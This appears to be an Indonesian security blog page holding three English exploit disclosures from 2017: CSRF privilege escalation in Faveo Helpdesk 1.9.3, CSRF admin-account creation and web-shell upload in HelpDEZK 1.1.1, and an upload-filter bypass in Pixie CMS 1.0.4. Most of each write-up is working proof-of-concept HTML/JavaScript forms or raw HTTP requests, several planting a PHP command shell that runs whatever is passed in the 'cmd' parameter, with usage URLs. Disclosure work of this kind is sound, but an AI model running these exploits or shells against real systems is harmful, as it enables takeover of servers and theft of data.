Open Source

Untuk seluruh software yang bersifat Open Source tidak akan tenggelam oleh waktu dikarenakan banyak yang mendukung program tersebut dan software tersebut tidak kalah bersaing dengan software berbayar lainnya.

Certified

Mengambil sertifikasi semata-mata bukan untuk menjadi tenar atau sombong, tapi untuk mengetahui apakah anda mampu mengemban tanggung jawab secara moral terhadap apa yang anda telah pelajari dan bagaimana memberikan ilmu tersebut kepada orang lain tanpa pamrih.

Operating System Pentest

Sistem operasi Bactrack, Kali Linux, dll memang sangat memanjakan para Pentester dalam melaksanakan tugasnya sesuai dengan prosedur yang berlaku. Di OS tersebut disediakan beberapa tools menarik seperti untuk memperoleh information gathering, vulnerability assesment, exploit, dll.

Sherlock Holmes

Film detektif yang satu ini pasti disukai oleh beberapa rekan IT dikarenakan proses jalan ceritanya ketika memecahkan sebuah kasus tidak monoton dan memerlukan logika berpikir yang diluar kebiasaan. Daya hayal harus tinggi ketika ingin menonton film ini.

Forensic

Kegiatan forensic bidang IT sangat membutuhkan tingkat pemahaman yang tinggi akan suatu kasus yang ditangani. Tim yang menangani forensic harus bisa membaca jalan pikiran si Attacker seperti apa jika melakukan serangan. Biasanya Attacker lebih maju selangkah dibanding dengan tim pemburunya.

Rabu, 05 April 2017

CSRF / Privilege Escalation (Manipulation of Role Agent to Admin) on Faveo version Community 1.9.3

Exploit Title: CSRF / Privilege Escalation (Manipulation of Role Agent to Admin) on Faveo version Community 1.9.3
Date: 05-April-2017
Exploit Author: @rungga_reksya, @yokoacc, @AdyWikradinata, @dickysofficial, @dvnrcy
Vendor Homepage: http://www.faveohelpdesk.com/
Software Link: https://codeload.github.com/ladybirdweb/faveo-helpdesk/zip/v1.9.3
Version: Community 1.9.3
Tested on: Windows Server 2012 Datacenter Evaluation
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L (8.3 - HIGH)


I. Background:
Faveo Helpdesk Open source ticketing system build on Laravel framework. Faveo word is derived from Latin which means to be favourable. Which truly highlights vision and the scope as well as the functionality of the product that Faveo is. It is specifically designed to cater the needs of startups and SME's empowering them with state of art, ticket based support system. In today's competitive startup scenario customer retention is one of the major challenges. Handling client query diligently is all the difference between retaining or losing a long lasting relationship.


II. Description:
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

Faveo have roles:
  • user (Cannot access backend)
  • agent (Can access backend but limited)
  • admin (Can full access backend)
III. Exploit:
CSRF Target is: “/public/rolechangeadmin/USER_ID”

user id = 11 (role is agent)
We have low privilege as “agent” to access application, and then want to change be admin role.
  • Make sample our script of CSRF (rolechange.html):
<html>
  <!-- CSRF PoC -->
  <body>
    <form action="http://192.168.228.186/faveo-helpdesk-1.9.3/public/rolechangeadmin/11" method="POST">
      <input type="hidden" name="group" value="1" />
      <input type="hidden" name="primary&#95;department" value="3" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  • Before running “rolechange.html”, please login your account as agent and running your html script.
  • Yeaaah, now user id 11 become admin privilege ^_^
Refer: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)
--> I attach our screenshot and script CSRF:

1 record users
2 record users
3 agent cannot access admin
4 execute html script
5 role changed successfully
6 user id 11 become admin role
csrf-faveo-agent-to-admin.txt livedemo.txt

Multiple CSRF / Code Execution Vulnerability on HelpDEZK 1.1.1

# Exploit Title: Multiple CSRF / Code Execution Vulnerability on HelpDEZK 1.1.1
# Date: 05-April-2017
# Exploit Author: @rungga_reksya, @yokoacc, @AdyWikradinata, @dickysofficial, @dvnrcy
# Vendor Homepage: http://www.helpdezk.org/
# Software Link: https://codeload.github.com/albandes/helpdezk/zip/v1.1.1
# Version: 1.1.1
# Tested on: Windows Server 2012 Datacenter Evaluation
# CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N (9.1 - CRITICAL)


I. Background:
HelpDEZk is a powerfull software that manages requests/incidents. It has all the needed requirements to an efficient workflow management of all processes involved in service execution. This control is done for internal demands and also for outsourced services. HelpDEZk can be used at any company's area, serving as an support to the shared service center concept, beyond the ability to log all the processes and maintain the request's history, it can pass it through many approval levels. HelpDEZk can put together advanced managing resources with an extremely easy use. Simple and intuitive screens make the day-by-day easier for your team, speeding up the procedures and saving up a lot of time. It is developped in objects oriented PHP language, with the MVC architecture and uses the templates system SMARTY. For the javascripts, JQUERY is used.

II. Description:
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

HelpDEZK have role for type person:

admin = 1
user = 2
operator = 3
costumer = 4
partner = 5
group = 6


III. Exploit:

—> The first CSRF Target is: “/admin/home#/person/”
(Admin - Records - People & Companies)

The guest (no have account) can make admin privilege with CSRF / Code Execution. This is script for make account admin:
<html>
  <!-- CSRF PoC on insert menu people -->
  <body>
    <form action="http://192.168.228.186/helpdezk-1.1.1/admin/person/insertNatural" method="POST">
      <input type="hidden" name="login" value="testing" />
      <input type="hidden" name="logintype" value=“3” />  <!-- Type Login = 3 (HD) -->
      <input type="hidden" name="password" value="testing" />
      <input type="hidden" name="name" value="testing" />
      <input type="hidden" name="email" value="testing&#64;local&#46;com" /> <!-- e.g: testing@local.com -->
      <input type="hidden" name="company" value="60" />
      <input type="hidden" name="department" value="1" />
      <input type="hidden" name="phone" value="" />
      <input type="hidden" name="branch" value="" />
      <input type="hidden" name="mobile" value="" />
      <input type="hidden" name="country" value="1" />
      <input type="hidden" name="state" value="1" />
      <input type="hidden" name="cpf" value="" />
      <input type="hidden" name="city" value="1" />
      <input type="hidden" name="neighborhood" value="Choose" />
      <input type="hidden" name="zipcode" value="" />
      <input type="hidden" name="typestreet" value="1" />
      <input type="hidden" name="address" value="Choose" />
      <input type="hidden" name="number" value="" />
      <input type="hidden" name="complement" value="" />
      <input type="hidden" name="typeuser" value="1" /> <!-- admin privilege -->
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="vip" value="N" />
      <input type="hidden" name="filladdress" value="N" />
      <input type="hidden" name="dtbirth" value="" />
      <input type="hidden" name="gender" value="M" />
      <input type="hidden" name="time&#95;value" value="" />
      <input type="hidden" name="overtime" value="" />
      <input type="hidden" name="changePassInsert" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

—> The second CSRF target is: /admin/home#/logos/
(Admin - Config - Logos)
If we have minimum low privilege, we can code execute to make shell on module logos (Position of Page Header, Login Page and Reports Logo). The HelpDEZK unrestricted file extension but normally access only for admin.

If you have low privilege, please choose which one to execute this code (before execute, you shall login into application):

<!-- CSRF PoC - Login Page Logo -->
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload2", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1883328331133778598415248998");
        xhr.withCredentials = true;
        var body = "-----------------------------1883328331133778598415248998\r\n" +
          "Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" +
          "Content-Type: text/php\r\n" +
          "\r\n" +
          "\x3c?php\n" +
          "\n" +
          "if(isset($_REQUEST[\'cmd\'])){\n" +
          "        echo \"\x3cpre\x3e\";\n" +
          "        $cmd = ($_REQUEST[\'cmd\']);\n" +
          "        system($cmd);\n" +
          "        echo \"\x3c/pre\x3e\";\n" +
          "        die;\n" +
          "}\n" +
          "\n" +
          "?\x3e\r\n" +
          "-----------------------------1883328331133778598415248998--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

————
 <!-- CSRF PoC Page Header Logo -->
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------11525671838941487412014811928");
        xhr.withCredentials = true;
        var body = "-----------------------------11525671838941487412014811928\r\n" +
          "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n" +
          "Content-Type: text/php\r\n" +
          "\r\n" +
          "\x3c?php\n" +
          "\n" +
          "if(isset($_REQUEST[\'cmd\'])){\n" +
          "        echo \"\x3cpre\x3e\";\n" +
          "        $cmd = ($_REQUEST[\'cmd\']);\n" +
          "        system($cmd);\n" +
          "        echo \"\x3c/pre\x3e\";\n" +
          "        die;\n" +
          "}\n" +
          "\n" +
          "?\x3e\r\n" +
          "-----------------------------11525671838941487412014811928--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

———————
  <!-- CSRF PoC - Reports Logo -->
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://192.168.228.186/helpdezk-1.1.1/admin/logos/upload3", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1789373681642463979344317937");
        xhr.withCredentials = true;
        var body = "-----------------------------1789373681642463979344317937\r\n" +
          "Content-Disposition: form-data; name=\"file\"; filename=\"index.php\"\r\n" +
          "Content-Type: text/php\r\n" +
          "\r\n" +
          "\x3c?php\n" +
          "\n" +
          "if(isset($_REQUEST[\'cmd\'])){\n" +
          "        echo \"\x3cpre\x3e\";\n" +
          "        $cmd = ($_REQUEST[\'cmd\']);\n" +
          "        system($cmd);\n" +
          "        echo \"\x3c/pre\x3e\";\n" +
          "        die;\n" +
          "}\n" +
          "\n" +
          "?\x3e\r\n" +
          "-----------------------------1789373681642463979344317937--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

————
If you have executed and success, check your file on:
http://example.com/helpdezk-1.1.1/app/uploads/logos/

and PWN ^_^
http://example.com/helpdezk-1.1.1/app/uploads/logos/login_index.php?cmd=ipconfig


IV. Thanks to:
- Alloh SWT
- MyBoboboy
- Komunitas IT Auditor & IT Security


Refer:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)

https://github.com/albandes/helpdezk/issues/2 

Screenshoot:


1 - Default Account

2 - Script Make Account Testing


3 - Execute Script to Make Account Testing

4 - Success for Make Account Testing

5 - Success to Login on Application

6 - Script to Make User Account

7 - Success to Login as User Privilege

8 - Account User don't Have Logos Menu

9 - Prepare Script to Make Shell on Logos Module

10 - Execute Script to Make Shell

11 - Directory Listing and Found Your Shell

12 - Success to Execute Your Shell

Minggu, 02 April 2017

Remote File Upload Vulnerability in File Manager Pixie 1.0.4 With Low Privilege

# Exploit Title: Remote File Upload Vulnerability in File Manager Pixie 1.0.4 With Low Privilege
# Google Dork: no
# Date: 02-April-2017
# Exploit Author: @rungga_reksya, @dvnrcy, @dickysofficial
# Vendor Homepage: http://www.getpixie.co.uk
# Software Link: https://us.softpedia-secure-download.com/dl/44791fdde14260bc7a8d08df65bcd048/58db4b5c/700044699/webscripts/php/pixie_v1.04.zip
# Version: 1.0.4
# CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)

# CVE-2017-7402


I. Background:
Pixie is a free, open source web application that will help quickly create your own website. Many people refer to this type of software as a "content management system (cms)", we prefer to call it as Small, Simple, Site Maker.

II. Description:
in Pixie CMS have three types for account privilege for upload:
- Administrator - Can access file manager but restricted extension for file upload.
- Client - Can access file manager but restricted extension for file upload.
- User - Cannot access file manager

Generally Pixie CMS have restricted extension for file upload and we cannot upload php extension. in normally if we upload php file, Pixie CMS will give information rejected like this “Upload failed. Please check that the folder is writeable and has the correct permissions set”.

III. Exploit:
In this case, we used privilege as client and then access to “file manager” (http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&x=filemanager). Please follow this step:

1. Prepare software to intercept (I used burpsuite free edtion).
2. Prepare for real image (our_shell.jpg).
3. Browse your real image on file manager pixie cms and click to upload button.
4. Intercept and change of filename “our_shell.jpg” to be “our_shell.jpg.php”
5. Under of perimeter “Content-Type: image/jpeg”, please change and write your shell. in this example, I use cmd shell.
6. If you done, forward your edit request in burpsuite and the pixie cms will give you information like this “our_shell.jpg.php was successfully uploaded”.
7. PWN (http://ip_address/folder_pixie_v1.04/files/other/our_shell.jpg.php?cmd=ipconfig)

————
POST /pixie_v1.04/admin/index.php?s=publish&x=filemanager HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/pixie_v1.04/admin/index.php?s=publish&x=filemanager
Cookie: INTELLI_843cae8f53=ovfo0mpq3t2ojmcphj320geku1; loader=loaded; INTELLI_dd03efc10f=2sf8jl7fjtk3j50p0mgmekpt72; f9f33fc94752373729dab739ff8cb5e7=poro8kl89grlc4dp5a4odu2c05; PHPSESSID=1ml97c15suo30kn1dalsp5fig4; bb2_screener_=1490835014+192.168.1.6; pixie_login=client%2C722b69fa2ae0f040e4ce7f075123cb18
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------8321182121675739546763935949
Content-Length: 901

-----------------------------8321182121675739546763935949
Content-Disposition: form-data; name="upload[]"; filename="our_shell.jpg.php"
Content-Type: image/jpeg

<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>


-----------------------------8321182121675739546763935949
Content-Disposition: form-data; name="file_tags"

ourshell
-----------------------------8321182121675739546763935949
Content-Disposition: form-data; name="submit_upload"

Upload
-----------------------------8321182121675739546763935949
Content-Disposition: form-data; name="MAX_FILE_SIZE"

102400
-----------------------------8321182121675739546763935949
Content-Disposition: form-data; name="bb2_screener_"

1490835014 192.168.1.6
-----------------------------8321182121675739546763935949--



This is our screenshot from PoC:


Upload for valid image

Change extension and insert your shell

Your shell success to upload on server

Example command for ipconfig

Example command for net user



IV. Thanks to:
- Alloh SWT
- MyBoboboy
- @rungga_reksya, @dvnrcy, @dickysofficial
- Komunitas IT Auditor & IT Security Kaskus